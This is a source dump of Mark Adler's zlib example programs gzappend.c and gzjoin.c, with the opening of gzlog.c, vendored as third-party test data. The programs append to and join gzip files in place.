In no event will the author be held liable for any damages arising from the use of this software. Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions: 1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required. 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software. 3. This notice may not be removed or altered from any source distribution. Mark Adler madler@alumni.caltech.edu */ /* * Change history: * * 1.0 19 Oct 2003 - First version * 1.1 4 Nov 2003 - Expand and clarify some comments and notes * - Add version and copyright to help * - Send help to stdout instead of stderr * - Add some preemptive typecasts * - Add L to constants in lseek() calls * - Remove some debugging information in error messages * - Use new data_type definition for zlib 1.2.1 * - Simplify and unify file operations * - Finish off gzip file in gztack() * - Use deflatePrime() instead of adding empty blocks * - Keep gzip file clean on appended file read errors * - Use in-place rotate instead of auxiliary buffer * (Why you ask? Because it was fun to write!) * 1.2 11 Oct 2012 - Fix for proper z_const usage * - Check for input buffer malloc failure */ /* gzappend takes a gzip file and appends to it, compressing files from the command line or data from stdin. The gzip file is written to directly, to avoid copying that file, in case it's large. Note that this results in the unfriendly behavior that if gzappend fails, the gzip file is corrupted. This program was written to illustrate the use of the new Z_BLOCK option of zlib 1.2.x's inflate() function. 
This option returns from inflate() at each block boundary to facilitate locating and modifying the last block bit at the start of the final deflate block. Also whether using Z_BLOCK or not, another required feature of zlib 1.2.x is that inflate() now provides the number of unused bits in the last input byte used. gzappend will not work with versions of zlib earlier than 1.2.1. gzappend first decompresses the gzip file internally, discarding all but the last 32K of uncompressed data, and noting the location of the last block bit and the number of unused bits in the last byte of the compressed data. The gzip trailer containing the CRC-32 and length of the uncompressed data is verified. This trailer will be later overwritten. Then the last block bit is cleared by seeking back in the file and rewriting the byte that contains it. Seeking forward, the last byte of the compressed data is saved along with the number of unused bits to initialize deflate. A deflate process is initialized, using the last 32K of the uncompressed data from the gzip file to initialize the dictionary. If the total uncompressed data was less than 32K, then all of it is used to initialize the dictionary. The deflate output bit buffer is also initialized with the last bits from the original deflate stream. From here on, the data to append is simply compressed using deflate, and written to the gzip file. When that is complete, the new CRC-32 and uncompressed length are written as the trailer of the gzip file. 
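*/

/* NOTE(review): the header names had been lost from the #include lines in
   this copy; they are restored here to cover the library calls made below
   (fprintf, exit/malloc, memmove, open, read/write/lseek/close). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include "zlib.h"

#define local static
#define LGCHUNK 14
#define CHUNK (1U << LGCHUNK)
#define DSIZE 32768U

/* print an error message and terminate with extreme prejudice */
local void bye(char *msg1, char *msg2)
{
    fprintf(stderr, "gzappend error: %s%s\n", msg1, msg2);
    exit(1);
}

/* return the greatest common divisor of a and b using Euclid's algorithm,
   modified to be fast when one argument much greater than the other, and
   coded to avoid unnecessary swapping */
local unsigned gcd(unsigned a, unsigned b)
{
    unsigned c;

    while (a && b)
        if (a > b) {
            c = b;
            while (a - c >= c)
                c <<= 1;
            a -= c;
        }
        else {
            c = a;
            while (b - c >= c)
                c <<= 1;
            b -= c;
        }
    return a + b;
}

/* rotate list[0..len-1] left by rot positions, in place */
local void rotate(unsigned char *list, unsigned len, unsigned rot)
{
    unsigned char tmp;
    unsigned cycles;
    unsigned char *start, *last, *to, *from;

    /* normalize rot and handle degenerate cases */
    if (len < 2) return;
    if (rot >= len) rot %= len;
    if (rot == 0) return;

    /* pointer to last entry in list */
    last = list + (len - 1);

    /* do simple left shift by one */
    if (rot == 1) {
        tmp = *list;
        memmove(list, list + 1, len - 1);
        *last = tmp;
        return;
    }

    /* do simple right shift by one */
    if (rot == len - 1) {
        tmp = *last;
        memmove(list + 1, list, len - 1);
        *list = tmp;
        return;
    }

    /* otherwise do rotate as a set of cycles in place */
    cycles = gcd(len, rot);             /* number of cycles */
    do {
        start = from = list + cycles;   /* start index is arbitrary */
        tmp = *from;                    /* save entry to be overwritten */
        for (;;) {
            to = from;                  /* next step in cycle */
            from += rot;                /* go right rot positions */
            if (from > last) from -= len;   /* (pointer better not wrap) */
            if (from == start) break;   /* all but one shifted */
            *to = *from;                /* shift left */
        }
        *to = tmp;                      /* complete the circle */
    } while (--cycles);
}

/* structure for gzip file read operations */
typedef struct {
    int fd;                     /* file descriptor */
    int size;                   /* 1 << size is bytes in buf */
    unsigned left;              /* bytes available at next */
    unsigned char *buf;         /* buffer */
    z_const unsigned char *next;    /* next byte in buffer */
    char *name;                 /* file name for error messages */
} file;

/* reload buffer -- returns the number of bytes read, which is zero at
   end-of-file; a read error does not return, it exits through bye() */
local int readin(file *in)
{
    int len;

    len = read(in->fd, in->buf, 1 << in->size);
    if (len == -1) bye("error reading ", in->name);
    in->left = (unsigned)len;
    in->next = in->buf;
    return len;
}

/* read from file in, exit if end-of-file */
local int readmore(file *in)
{
    if (readin(in) == 0) bye("unexpected end of ", in->name);
    return 0;
}

/* next byte of in -- refills through readmore() when the buffer is empty, so
   the program exits rather than reading past the end of the file */
#define read1(in) (in->left == 0 ? readmore(in) : 0, \
                   in->left--, *(in->next)++)

/* skip over n bytes of in -- whole buffer-sized multiples beyond what is
   buffered are passed over with lseek(), the remainder by reading; the
   program exits if the file ends before n bytes have been skipped */
local void skip(file *in, unsigned n)
{
    unsigned bypass;

    if (n > in->left) {
        n -= in->left;
        bypass = n & ~((1U << in->size) - 1);
        if (bypass) {
            if (lseek(in->fd, (off_t)bypass, SEEK_CUR) == -1)
                bye("seeking ", in->name);
            n -= bypass;
        }
        readmore(in);
        if (n > in->left)
            bye("unexpected end of ", in->name);
    }
    in->left -= n;
    in->next += n;
}

/* read a four-byte unsigned integer, little-endian, from in */
unsigned long read4(file *in)
{
    unsigned long val;

    val = read1(in);
    val += (unsigned)read1(in) << 8;
    val += (unsigned long)read1(in) << 16;
    val += (unsigned long)read1(in) << 24;
    return val;
}

/* skip over gzip header -- every field is taken from the file being read;
   the unterminated-string loops below end either at a zero byte or, through
   read1(), with an exit at end-of-file */
local void gzheader(file *in)
{
    int flags;
    unsigned n;

    if (read1(in) != 31 || read1(in) != 139) bye(in->name, " not a gzip file");
    /* the two messages below now end in a space, so that the file name is
       not run together with the last word */
    if (read1(in) != 8) bye("unknown compression method in ", in->name);
    flags = read1(in);
    if (flags & 0xe0) bye("unknown header flags set in ", in->name);
    skip(in, 6);
    if (flags & 4) {
        n = read1(in);
        n += (unsigned)(read1(in)) << 8;
        skip(in, n);
    }
    if (flags & 8) while (read1(in) != 0) ;
    if (flags & 16) while (read1(in) != 0) ;
    if (flags & 2) skip(in, 2);
}

/* decompress gzip file "name", return strm with a deflate stream ready to
   continue compression of the data in the gzip file, and return a file
   descriptor pointing to where to write the compressed data -- the deflate
   stream is initialized to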
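compress using level "level" */
local int gzscan(char *name, z_stream *strm, int level)
{
    int ret, lastbit, left, full;
    unsigned have;
    unsigned long crc, tot;
    unsigned char *window;
    off_t lastoff, end;
    file gz;

    /* open gzip file */
    gz.name = name;
    gz.fd = open(name, O_RDWR, 0);
    if (gz.fd == -1) bye("cannot open ", name);
    gz.buf = malloc(CHUNK);
    if (gz.buf == NULL) bye("out of memory", "");
    gz.size = LGCHUNK;
    gz.left = 0;

    /* skip gzip header */
    gzheader(&gz);

    /* prepare to decompress */
    window = malloc(DSIZE);
    if (window == NULL) bye("out of memory", "");
    strm->zalloc = Z_NULL;
    strm->zfree = Z_NULL;
    strm->opaque = Z_NULL;
    ret = inflateInit2(strm, -15);
    if (ret != Z_OK) bye("out of memory", " or library mismatch");

    /* decompress the deflate stream, saving append information -- every
       lseek() in this function is checked, because the offsets it yields
       decide which bytes of the file are rewritten further down */
    lastbit = 0;
    lastoff = lseek(gz.fd, 0L, SEEK_CUR);
    if (lastoff == -1) bye("seeking ", name);
    lastoff -= gz.left;
    left = 0;
    strm->avail_in = gz.left;
    strm->next_in = gz.next;
    crc = crc32(0L, Z_NULL, 0);
    have = full = 0;
    do {
        /* if needed, get more input */
        if (strm->avail_in == 0) {
            readmore(&gz);
            strm->avail_in = gz.left;
            strm->next_in = gz.next;
        }

        /* set up output to next available section of sliding window */
        strm->avail_out = DSIZE - have;
        strm->next_out = window + have;

        /* inflate and check for errors */
        ret = inflate(strm, Z_BLOCK);
        if (ret == Z_STREAM_ERROR) bye("internal stream error!", "");
        if (ret == Z_MEM_ERROR) bye("out of memory", "");
        if (ret == Z_DATA_ERROR)
            bye("invalid compressed data--format violated in ", name);

        /* update crc and sliding window pointer */
        crc = crc32(crc, window + have, DSIZE - have - strm->avail_out);
        if (strm->avail_out)
            have = DSIZE - strm->avail_out;
        else {
            have = 0;
            full = 1;
        }

        /* process end of block */
        if (strm->data_type & 128) {
            if (strm->data_type & 64)
                left = strm->data_type & 0x1f;
            else {
                lastbit = strm->data_type & 0x1f;
                lastoff = lseek(gz.fd, 0L, SEEK_CUR);
                if (lastoff == -1) bye("seeking ", name);
                lastoff -= strm->avail_in;
            }
        }
    } while (ret != Z_STREAM_END);
    inflateEnd(strm);
    gz.left = strm->avail_in;
    gz.next = strm->next_in;

    /* save the location of the end of the compressed data */
    end = lseek(gz.fd, 0L, SEEK_CUR);
    if (end == -1) bye("seeking ", name);
    end -= gz.left;

    /* check gzip trailer and save total for deflate */
    if (crc != read4(&gz))
        bye("invalid compressed data--crc mismatch in ", name);
    tot = strm->total_out;
    if ((tot & 0xffffffffUL) != read4(&gz))
        bye("invalid compressed data--length mismatch in ", name);

    /* if not at end of file, warn */
    if (gz.left || readin(&gz))
        fprintf(stderr,
            "gzappend warning: junk at end of gzip file overwritten\n");

    /* clear last block bit -- from here on the gzip file is modified in
       place, so a failed seek must stop the program before the write */
    if (lseek(gz.fd, lastoff - (lastbit != 0), SEEK_SET) == -1)
        bye("seeking ", name);
    if (read(gz.fd, gz.buf, 1) != 1) bye("reading after seek on ", name);
    *gz.buf = (unsigned char)(*gz.buf ^ (1 << ((8 - lastbit) & 7)));
    if (lseek(gz.fd, -1L, SEEK_CUR) == -1)
        bye("seeking ", name);
    if (write(gz.fd, gz.buf, 1) != 1) bye("writing after seek to ", name);

    /* if window wrapped, build dictionary from window by rotating */
    if (full) {
        rotate(window, DSIZE, have);
        have = DSIZE;
    }

    /* set up deflate stream with window, crc, total_in, and leftover bits */
    ret = deflateInit2(strm, level, Z_DEFLATED, -15, 8, Z_DEFAULT_STRATEGY);
    if (ret != Z_OK) bye("out of memory", "");
    deflateSetDictionary(strm, window, have);
    strm->adler = crc;
    strm->total_in = tot;
    if (left) {
        if (lseek(gz.fd, --end, SEEK_SET) == -1)
            bye("seeking ", name);
        if (read(gz.fd, gz.buf, 1) != 1) bye("reading after seek on ", name);
        deflatePrime(strm, 8 - left, *gz.buf);
    }
    if (lseek(gz.fd, end, SEEK_SET) == -1)
        bye("seeking ", name);

    /* clean up and return */
    free(window);
    free(gz.buf);
    return gz.fd;
}

/* append file "name" to gzip file gd using deflate stream strm -- if last
   is true, then finish off the deflate stream at the end

   A NULL name means standard input.  A file that cannot be opened is reported
   once and then treated as empty, so that the deflate stream is still
   finished when last is true. */
local void gztack(char *name, int gd, z_stream *strm, int last)
{
    int fd, len, ret;
    int put;                    /* result of each write() of compressed data */
    unsigned left;
    unsigned char *in, *out;

    /* open file to compress and append */
    fd = 0;
    if (name != NULL) {
        fd = open(name, O_RDONLY, 0);
        if (fd == -1)
            fprintf(stderr, "gzappend warning: %s not found, skipping ...\n",
                    name);
    }

    /* allocate buffers */
    in = malloc(CHUNK);
    out = malloc(CHUNK);
    if (in == NULL || out == NULL) bye("out of memory", "");

    /* compress input file and append to gzip file */
    do {
        /* get more input -- nothing is read from a file that failed to open */
        len = fd == -1 ? 0 : (int)read(fd, in, CHUNK);
        if (len == -1) {
            fprintf(stderr,
                    "gzappend warning: error reading %s, skipping rest ...\n",
                    name == NULL ? "stdin" : name);
            len = 0;
        }
        strm->avail_in = (unsigned)len;
        strm->next_in = in;
        if (len) strm->adler = crc32(strm->adler, in, (unsigned)len);

        /* compress and write all available output -- the write() result is
           kept apart from len, because len is what selects Z_FINISH here and
           what ends the outer loop once the input is exhausted */
        do {
            strm->avail_out = CHUNK;
            strm->next_out = out;
            ret = deflate(strm, last && len == 0 ? Z_FINISH : Z_NO_FLUSH);
            left = CHUNK - strm->avail_out;
            while (left) {
                put = write(gd, out + CHUNK - strm->avail_out - left, left);
                if (put == -1) bye("writing gzip file", "");
                left -= (unsigned)put;
            }
        } while (strm->avail_out == 0 && ret != Z_STREAM_END);
    } while (len != 0);

    /* write trailer after last entry -- CRC-32 then length, each as four
       bytes, least significant byte first */
    if (last) {
        deflateEnd(strm);
        out[0] = (unsigned char)(strm->adler);
        out[1] = (unsigned char)(strm->adler >> 8);
        out[2] = (unsigned char)(strm->adler >> 16);
        out[3] = (unsigned char)(strm->adler >> 24);
        out[4] = (unsigned char)(strm->total_in);
        out[5] = (unsigned char)(strm->total_in >> 8);
        out[6] = (unsigned char)(strm->total_in >> 16);
        out[7] = (unsigned char)(strm->total_in >> 24);
        len = 8;
        do {
            ret = write(gd, out + 8 - len, len);
            if (ret == -1) bye("writing gzip file", "");
            len -= ret;
        } while (len);
        close(gd);
    }

    /* clean up and return */
    free(out);
    free(in);
    if (fd > 0) close(fd);
}

/* process the compression level option if present, scan the gzip file, and
   append the specified files, or append the data from stdin if no other file
   names are provided on the command line -- the gzip file must be writable
   and seekable */
int main(int argc, char **argv)
{
    int gd, level;
    z_stream strm;

    /* ignore command name */
    argc--;
    argv++;

    /* provide usage if no arguments */
    if (*argv == NULL) {
        printf(
            "gzappend 1.2 (11 Oct 2012) Copyright (C) 2003, 2012 Mark Adler\n"
               );
        printf(
            "usage: gzappend [-level] file.gz [ addthis [ andthis ... ]]\n");
        return 0;
    }

    /* set compression level -- exactly one digit after the dash is accepted */
    level = Z_DEFAULT_COMPRESSION;
    if (argv[0][0] == '-') {
        if (argv[0][1] < '0' || argv[0][1] > '9' || argv[0][2] != 0)
            bye("invalid compression level", "");
        level = argv[0][1] - '0';
        if (*++argv == NULL) bye("no gzip file name after options", "");
    }

    /* prepare to append to gzip file */
    gd = gzscan(*argv++, &strm, level);

    /* append files on command line, or from stdin if none */
    if (*argv == NULL)
        gztack(NULL, gd, &strm, 1);
    else
        do {
            gztack(*argv, gd, &strm, argv[1] == NULL);
        } while (*++argv != NULL);
    return 0;
}

================================================
FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/gzjoin.c
================================================
/* gzjoin -- command to join gzip files into one gzip file

  Copyright (C) 2004, 2005, 2012 Mark Adler, all rights reserved
  version 1.2, 14 Aug 2012

  This software is provided 'as-is', without any express or implied
  warranty.  In no event will the author be held liable for any damages
  arising from the use of this software.

  Permission is granted to anyone to use this software for any purpose,
  including commercial applications, and to alter it and redistribute it
  freely, subject to the following restrictions:

  1. The origin of this software must not be misrepresented; you must not
     claim that you wrote the original software. If you use this software
     in a product, an acknowledgment in the product documentation would be
     appreciated but is not required.
  2. Altered source versions must be plainly marked as such, and must not be
     misrepresented as being the original software.
  3. This notice may not be removed or altered from any source distribution.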
Mark Adler madler@alumni.caltech.edu */ /* * Change history: * * 1.0 11 Dec 2004 - First version * 1.1 12 Jun 2005 - Changed ssize_t to long for portability * 1.2 14 Aug 2012 - Clean up for z_const usage */ /* gzjoin takes one or more gzip files on the command line and writes out a single gzip file that will uncompress to the concatenation of the uncompressed data from the individual gzip files. gzjoin does this without having to recompress any of the data and without having to calculate a new crc32 for the concatenated uncompressed data. gzjoin does however have to decompress all of the input data in order to find the bits in the compressed data that need to be modified to concatenate the streams. gzjoin does not do an integrity check on the input gzip files other than checking the gzip header and decompressing the compressed data. They are otherwise assumed to be complete and correct. Each joint between gzip files removes at least 18 bytes of previous trailer and subsequent header, and inserts an average of about three bytes to the compressed data in order to connect the streams. The output gzip file has a minimal ten-byte gzip header with no file name or modification time. This program was written to illustrate the use of the Z_BLOCK option of inflate() and the crc32_combine() function. gzjoin will not compile with versions of zlib earlier than 1.2.3. 
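 */

/* The header names below were lost from this copy of the file; they are
   restored from the functions each line's comment lists. */
#include <stdio.h>      /* fputs(), fprintf(), fwrite(), putc() */
#include <stdlib.h>     /* exit(), malloc(), free() */
#include <fcntl.h>      /* open() */
#include <unistd.h>     /* close(), read(), lseek() */
#include "zlib.h"       /* crc32(), crc32_combine(), inflateInit2(), inflate(),
                           inflateEnd() */

#define local static

/* Report a fatal error on stderr and terminate the process with status 1.
   why1 and why2 are concatenated into the message.  The int return type and
   the unreachable "return 0" exist only so that bail() can be used inside an
   expression, as the bget() macro does. */
local int bail(char *why1, char *why2)
{
    fprintf(stderr, "gzjoin error: %s%s, output incomplete\n", why1, why2);
    exit(1);
    return 0;
}

/* -- simple buffered file input with access to the buffer -- */

#define CHUNK 32768         /* must be a power of two and fit in unsigned */

/* bin buffered input file type */
typedef struct {
    char *name;             /* name of file for error messages */
    int fd;                 /* file descriptor */
    unsigned left;          /* bytes remaining at next */
    unsigned char *next;    /* next byte to read */
    unsigned char *buf;     /* allocated buffer of length CHUNK */
} bin;

/* Close a buffered file and free allocated memory.  Accepts NULL and a
   partially constructed bin (fd == -1 or buf == NULL), which is how bopen()
   cleans up after a failed allocation or open. */
local void bclose(bin *in)
{
    if (in != NULL) {
        if (in->fd != -1)
            close(in->fd);
        if (in->buf != NULL)
            free(in->buf);
        free(in);
    }
}

/* Open the file name for buffered input.  Returns a pointer to a new bin, or
   NULL if either allocation or the open() fails.  The name pointer is stored,
   not copied, so it must outlive the returned bin. */
local bin *bopen(char *name)
{
    bin *in;

    in = malloc(sizeof(bin));
    if (in == NULL)
        return NULL;
    in->buf = malloc(CHUNK);
    in->fd = open(name, O_RDONLY, 0);
    if (in->buf == NULL || in->fd == -1) {
        bclose(in);
        return NULL;
    }
    in->left = 0;
    in->next = in->buf;
    in->name = name;
    return in;
}

/* Load the buffer from the file when it is empty.  Returns -1 on a read error
   (or a NULL in), 0 if data is available and end-of-file was not seen, or 1
   if end-of-file was reached while filling.  A buffer that still holds data
   is left untouched and 0 is returned. */
local int bload(bin *in)
{
    long len;

    if (in == NULL)
        return -1;
    if (in->left != 0)
        return 0;
    in->next = in->buf;
    do {
        /* read() may return short counts, so keep going until the buffer is
           full or the file ends */
        len = (long)read(in->fd, in->buf + in->left, CHUNK - in->left);
        if (len < 0)
            return -1;
        in->left += (unsigned)len;
    } while (len != 0 && in->left < CHUNK);
    return len == 0 ? 1 : 0;
}

/* get a byte from the file, bail if end of file -- a read error in bload()
   leaves the buffer empty and is reported the same way */
#define bget(in) (in->left ? 0 : bload(in), \
                  in->left ? (in->left--, *(in->next)++) : \
                    bail("unexpected end of file on ", in->name))

/* get a four-byte little-endian unsigned integer from file */
local unsigned long bget4(bin *in)
{
    unsigned long val;

    val = bget(in);
    val += (unsigned long)(bget(in)) << 8;
    val += (unsigned long)(bget(in)) << 16;
    val += (unsigned long)(bget(in)) << 24;
    return val;
}

/* Skip the next skip bytes of the file.  Bytes already buffered are consumed
   first; whole multiples of CHUNK beyond that are passed over with lseek()
   instead of being read.  Bails if the file ends before skip bytes have been
   passed, or if a required seek fails. */
local void bskip(bin *in, unsigned skip)
{
    /* check pointer */
    if (in == NULL)
        return;

    /* easy case -- skip bytes in buffer */
    if (skip <= in->left) {
        in->left -= skip;
        in->next += skip;
        return;
    }

    /* skip what's in buffer, discard buffer contents */
    skip -= in->left;
    in->left = 0;

    /* seek past multiples of CHUNK bytes */
    if (skip > CHUNK) {
        unsigned left;

        left = skip & (CHUNK - 1);
        if (left == 0) {
            /* exact number of chunks: seek all the way minus one byte to check
               for end-of-file with a read -- a failed seek (for example on an
               input that is not seekable) must stop here, otherwise the read
               below would succeed at the wrong offset and the header would be
               parsed from the wrong bytes */
            if (lseek(in->fd, skip - 1, SEEK_CUR) == (off_t)-1)
                bail("could not seek on ", in->name);
            if (read(in->fd, in->buf, 1) != 1)
                bail("unexpected end of file on ", in->name);
            return;
        }

        /* skip the integral chunks, update skip with remainder */
        if (lseek(in->fd, skip - left, SEEK_CUR) == (off_t)-1)
            bail("could not seek on ", in->name);
        skip = left;
    }

    /* read more input and skip remainder */
    bload(in);
    if (skip > in->left)
        bail("unexpected end of file on ", in->name);
    in->left -= skip;
    in->next += skip;
}

/* -- end of buffered input functions -- */

/* Skip the gzip header from file in, leaving the input positioned at the
   first byte of deflate data.  Bails if the magic bytes or compression method
   are wrong, if any of the reserved flag bits (mask 0xe0) is set, or if the
   file ends inside the header.  The optional fields are skipped without being
   interpreted, and the header crc, when present, is not verified. */
local void gzhead(bin *in)
{
    int flags;

    /* verify gzip magic header and compression method */
    if (bget(in) != 0x1f || bget(in) != 0x8b || bget(in) != 8)
        bail(in->name, " is not a valid gzip file");

    /* get and verify flags */
    flags = bget(in);
    if ((flags & 0xe0) != 0)
        bail("unknown reserved bits set in ", in->name);

    /* skip modification time, extra flags, and os */
    bskip(in, 6);

    /* skip extra field if present -- the two-byte little-endian length comes
       from the file, so it is at most 65535 */
    if (flags & 4) {
        unsigned len;

        len = bget(in);
        len += (unsigned)(bget(in)) << 8;
        bskip(in, len);
    }

    /* skip file name if present (zero-terminated; bget() bails at end of
       file, so the loop cannot run past the input) */
    if (flags & 8)
        while (bget(in) != 0)
            ;

    /* skip comment if present (zero-terminated, as above) */
    if (flags & 16)
        while (bget(in) != 0)
            ;

    /* skip header crc if present */
    if (flags & 2)
        bskip(in, 2);
}

/* write a four-byte little-endian unsigned integer to out */
local void put4(unsigned long val, FILE *out)
{
    putc(val & 0xff, out);
    putc((val >> 8) & 0xff, out);
    putc((val >> 16) & 0xff, out);
    putc((val >> 24) & 0xff, out);
}

/* Load up zlib stream from buffered input, bail if end of file.  The stream
   is pointed directly at the bin buffer; no data is copied. */
local void zpull(z_streamp strm, bin *in)
{
    if (in->left == 0)
        bload(in);
    if (in->left == 0)
        bail("unexpected end of file on ", in->name);
    strm->avail_in = in->left;
    strm->next_in = in->next;
}

/* Write header for gzip file to out and initialize trailer.  The header is
   the fixed ten bytes: magic, deflate method, no flags, zero modification
   time, no extra flags, and 0xff for the OS byte. */
local void gzinit(unsigned long *crc, unsigned long *tot, FILE *out)
{
    fwrite("\x1f\x8b\x08\0\0\0\0\0\0\xff", 1, 10, out);
    *crc = crc32(0L, Z_NULL, 0);
    *tot = 0;
}

/* Copy the compressed data from name, zeroing the last block bit of the last
   block if clr is true, and adding empty blocks as needed to get to a byte
   boundary.  If clr is false, then the last block becomes the last block of
   the output, and the gzip trailer is written.  crc and tot maintains the
   crc and length (modulo 2^32) of the output for the trailer.  The resulting
   gzip file is written to out.  gzinit() must be called before the first call
   of gzcopy() to write the gzip header and to initialize crc and tot.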
 */
local void gzcopy(char *name, int clr, unsigned long *crc, unsigned long *tot,
                  FILE *out)
{
    int ret;                /* return value from zlib functions */
    int pos;                /* where the "last block" bit is in byte */
    int last;               /* true if processing the last block */
    bin *in;                /* buffered input file */
    unsigned char *start;   /* start of compressed data in buffer */
    unsigned char *junk;    /* buffer for uncompressed data -- discarded */
    z_off_t len;            /* length of uncompressed data (support > 4 GB) */
    z_stream strm;          /* zlib inflate stream */

    /* open gzip file and skip header -- bail() exits the process, so in is
       never NULL past this point */
    in = bopen(name);
    if (in == NULL)
        bail("could not open ", name);
    gzhead(in);

    /* allocate buffer for uncompressed data and initialize raw inflate
       stream (negative window bits: no zlib or gzip wrapper is expected,
       since gzhead() has already consumed the gzip header) */
    junk = malloc(CHUNK);
    strm.zalloc = Z_NULL;
    strm.zfree = Z_NULL;
    strm.opaque = Z_NULL;
    strm.avail_in = 0;
    strm.next_in = Z_NULL;
    ret = inflateInit2(&strm, -15);
    if (junk == NULL || ret != Z_OK)
        bail("out of memory", "");

    /* inflate and copy compressed data, clear last-block bit if requested --
       the last-block bit of the first block is the low bit of the first
       byte of deflate data */
    len = 0;
    zpull(&strm, in);
    start = in->next;
    last = start[0] & 1;
    if (last && clr)
        start[0] &= ~1;
    strm.avail_out = 0;
    for (;;) {
        /* if input used and output done, write used input and get more */
        if (strm.avail_in == 0 && strm.avail_out != 0) {
            fwrite(start, 1, strm.next_in - start, out);
            start = in->buf;
            in->left = 0;
            zpull(&strm, in);
        }

        /* decompress -- return early when end-of-block reached; the
           decompressed bytes land in junk and are overwritten on every pass,
           only their count is kept */
        strm.avail_out = CHUNK;
        strm.next_out = junk;
        ret = inflate(&strm, Z_BLOCK);
        /* bail() does not return, so the first case never runs into the
           second; only these two return codes are handled, any other value
           lets the loop continue */
        switch (ret) {
        case Z_MEM_ERROR:
            bail("out of memory", "");
        case Z_DATA_ERROR:
            bail("invalid compressed data in ", in->name);
        }

        /* update length of uncompressed data */
        len += CHUNK - strm.avail_out;

        /* check for block boundary (only get this when block copied out) */
        if (strm.data_type & 128) {
            /* if that was the last block, then done */
            if (last)
                break;

            /* number of unused bits in last byte */
            pos = strm.data_type & 7;

            /* find the next last-block bit */
            if (pos != 0) {
                /* next last-block bit is in last used byte -- the byte is
                   modified through in->buf rather than through strm.next_in;
                   presumably because next_in may be const-qualified (see the
                   1.2 entry in the change history) */
                pos = 0x100 >> pos;
                last = strm.next_in[-1] & pos;
                if (last && clr)
                    in->buf[strm.next_in - in->buf - 1] &= ~pos;
            }
            else {
                /* next last-block bit is in next unused byte */
                if (strm.avail_in == 0) {
                    /* don't have that byte yet -- get it */
                    fwrite(start, 1, strm.next_in - start, out);
                    start = in->buf;
                    in->left = 0;
                    zpull(&strm, in);
                }
                last = strm.next_in[0] & 1;
                if (last && clr)
                    in->buf[strm.next_in - in->buf] &= ~1;
            }
        }
    }

    /* update buffer with unused input */
    in->left = strm.avail_in;
    in->next = in->buf + (strm.next_in - in->buf);

    /* copy used input, write empty blocks to get to byte boundary -- all of
       the used input except its final byte is written here; that byte is
       handled separately below because its unused bits may need filling */
    pos = strm.data_type & 7;
    fwrite(start, 1, in->next - start - 1, out);
    last = in->next[-1];
    if (pos == 0 || !clr)
        /* already at byte boundary, or last file: write last byte */
        putc(last, out);
    else {
        /* append empty blocks to last byte */
        last &= ((0x100 >> pos) - 1);       /* assure unused bits are zero */
        if (pos & 1) {
            /* odd -- append an empty stored block */
            putc(last, out);
            if (pos == 1)
                putc(0, out);               /* two more bits in block header */
            fwrite("\0\0\xff\xff", 1, 4, out);
        }
        else {
            /* even -- append 1, 2, or 3 empty fixed blocks; the cases have
               no break, so case 6 continues into case 4 and case 4 into
               case 2, giving three, two, or one block */
            switch (pos) {
            case 6:
                putc(last | 8, out);
                last = 0;
            case 4:
                putc(last | 0x20, out);
                last = 0;
            case 2:
                putc(last | 0x80, out);
                putc(0, out);
            }
        }
    }

    /* update crc and tot -- the crc for this member is the value read from
       its own trailer with bget4(); it is combined, not recomputed, so the
       decompressed data is not checked against it here (the file header
       comment says as much).  The trailer's length field is not read; len
       is the count accumulated during inflation. */
    *crc = crc32_combine(*crc, bget4(in), len);
    *tot += (unsigned long)len;

    /* clean up */
    inflateEnd(&strm);
    free(junk);
    bclose(in);

    /* write trailer if this is the last gzip file */
    if (!clr) {
        put4(*crc, out);
        put4(*tot, out);
    }

    /* NOTE(review): none of the fwrite()/putc() calls in this function have
       their return values checked, so a failed write to out is not detected
       here */
}

/* join the gzip files on the command line, write result to stdout */
int main(int argc, char **argv)
{
    unsigned long crc, tot;     /* running crc and total uncompressed length */

    /* skip command name */
    argc--;
    argv++;

    /* show usage if no arguments */
    if (argc == 0) {
        fputs("gzjoin usage: gzjoin f1.gz [f2.gz [f3.gz ...]] > fjoin.gz\n",
              stderr);
        return 0;
    }

    /* join gzip files on command line and write to stdout -- argc has
       already been decremented when it is passed as clr, so it is the
       number of files still to come: nonzero for every file but the last */
    gzinit(&crc, &tot, stdout);
    while (argc--)
        gzcopy(*argv++, argc, &crc, &tot, stdout);

    /* done */
    return 0;
}

================================================
FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/gzlog.c
================================================
/*
 * gzlog.c
 * Copyright (C) 2004, 2008, 2012, 2016, 2019 Mark Adler, all rights reserved
 * For conditions of distribution and use, see copyright notice in gzlog.h
 * version 2.3, 25 May 2019
 */

/*
   gzlog provides a mechanism for frequently appending short strings to a gzip
   file that is efficient both in execution time and compression ratio.  The
   strategy is to write the short strings in an uncompressed form to the end of
   the gzip file, only compressing when the amount of uncompressed data has
   reached a given threshold.

   gzlog also provides protection against interruptions in the process due to
   system crashes.  The status of the operation is recorded in an extra field
   in the gzip file, and is only updated once the gzip file is brought to a
   valid state.  The last data to be appended or compressed is saved in an
   auxiliary file, so that if the operation is interrupted, it can be completed
   the next time an append operation is attempted.

   gzlog maintains another auxiliary file with the last 32K of data from the
   compressed portion, which is preloaded for the compression of the subsequent
   data.  This minimizes the impact to the compression ratio of appending.
*/ /* Operations Concept: Files (log name "foo"): foo.gz -- gzip file with the complete log foo.add -- last message to append or last data to compress foo.dict -- dictionary of the last 32K of data for next compression foo.temp -- temporary dictionary file for compression after this one foo.lock -- lock file for reading and writing the other files foo.repairs -- log file for log file recovery operations (not compressed) gzip file structure: - fixed-length (no file name) header with extra field (see below) - compressed data ending initially with empty stored block - uncompressed data filling out originally empty stored block and subsequent stored blocks as needed (16K max each) - gzip trailer - no junk at end (no other gzip streams) When appending data, the information in the first three items above plus the foo.add file are sufficient to recover an interrupted append operation. The extra field has the necessary information to restore the start of the last stored block and determine where to append the data in the foo.add file, as well as the crc and length of the gzip data before the append operation. The foo.add file is created before the gzip file is marked for append, and deleted after the gzip file is marked as complete. So if the append operation is interrupted, the data to add will still be there. If due to some external force, the foo.add file gets deleted between when the append operation was interrupted and when recovery is attempted, the gzip file will still be restored, but without the appended data. When compressing data, the information in the first two items above plus the foo.add file are sufficient to recover an interrupted compress operation. The extra field has the necessary information to find the end of the compressed data, and contains both the crc and length of just the compressed data and of the complete set 